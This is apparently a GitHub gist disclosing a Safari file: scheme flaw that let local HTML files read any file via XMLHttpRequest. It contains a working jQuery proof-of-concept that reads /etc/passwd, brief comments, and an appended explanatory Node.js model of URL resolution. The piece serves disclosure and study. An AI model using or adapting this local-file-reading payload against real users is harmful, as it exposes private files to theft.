Safari FILE: scheme security hole
It appears that Safari does not enforce any kind of access
restrictions for XMLHTTPRequests on FILE: scheme URLs. As a
result, any HTML file on the local file system that is opened in
Safari can read any file that the user has access to (and, of
course, it can upload those files too). Here's a little
proof-of-concept. Copy and paste this into a local HTML file and
open it in Safari. It will display the contents of /etc/passwd.

<script src=https://code.jquery.com/jquery-2.1.3.min.js></script>
<script>
$.ajax({url: '/etc/passwd'}).done(function (s) {
  $('body').html('<pre>' + s + '</pre>');
});
</script>

Tested on Safari 7.1.4. FF and Chrome do not appear to have this problem.
UPDATE: Turns out this is a known problem:
https://community.rapid7.com/community/metasploit/blog/2013/04/25/abusing-safaris-webarchive-file-format
@chesleybrown

commented Mar 27, 2015

Ah, now that's not nearly as bad as I had originally thought. I was losing my mind there for a few minutes thinking "No way... no way is it that simple". lol

@rongarret

Owner Author

commented Mar 27, 2015

I dunno, this seems pretty bad to me. Why do you think it's not?

@sandrogauci

commented Mar 31, 2015

@rongarret I think @chesleybrown thought that the file could be hosted on a website and display local files. It needs to be opened locally for it to be able to read local files.
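
Added example (not part of the gist or its comments): a small Node.js model of why the PoC's `/etc/passwd` request reaches a local file only when the page itself is opened from a `file:` URL, and of what a strict policy would decide instead. The function name `evaluate`, the sample paths and the "strict" rule (a `file:` target is never script-readable) are assumptions made for illustration; CORS is not modeled.

```javascript
// Added illustration. Names, sample paths and the "strict" rule are
// assumptions for this sketch, not taken from any browser's source.

function evaluate(documentUrl, requestUrl) {
  const doc = new URL(documentUrl);
  // A path-absolute URL such as '/etc/passwd' is resolved against the
  // URL of the document that issues the request.
  const target = new URL(requestUrl, documentUrl);

  const docIsLocal = doc.protocol === 'file:';
  const targetIsLocal = target.protocol === 'file:';
  // Ordinary same-origin web request (cross-origin/CORS not modeled).
  const sameWebOrigin =
    !docIsLocal && !targetIsLocal && doc.origin === target.origin;

  return {
    resolved: target.href,
    targetIsLocal,
    // Behaviour the gist reports: a file: document may read any file: URL.
    permissive: sameWebOrigin || (docIsLocal && targetIsLocal),
    // Strict model (assumption): a file: target is never script-readable.
    strict: sameWebOrigin,
  };
}

// Constructed sample inputs.
const samples = [
  // The gist's case: HTML saved locally and opened from disk.
  ['file:///Users/alice/Downloads/poc.html', '/etc/passwd'],
  // Same markup served by a website: the path resolves on that server.
  ['https://example.com/poc.html', '/etc/passwd'],
  // A web page naming a file: URL explicitly.
  ['https://example.com/poc.html', 'file:///etc/passwd'],
];

for (const [docUrl, reqUrl] of samples) {
  console.log(docUrl, '->', reqUrl, evaluate(docUrl, reqUrl));
}
```
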
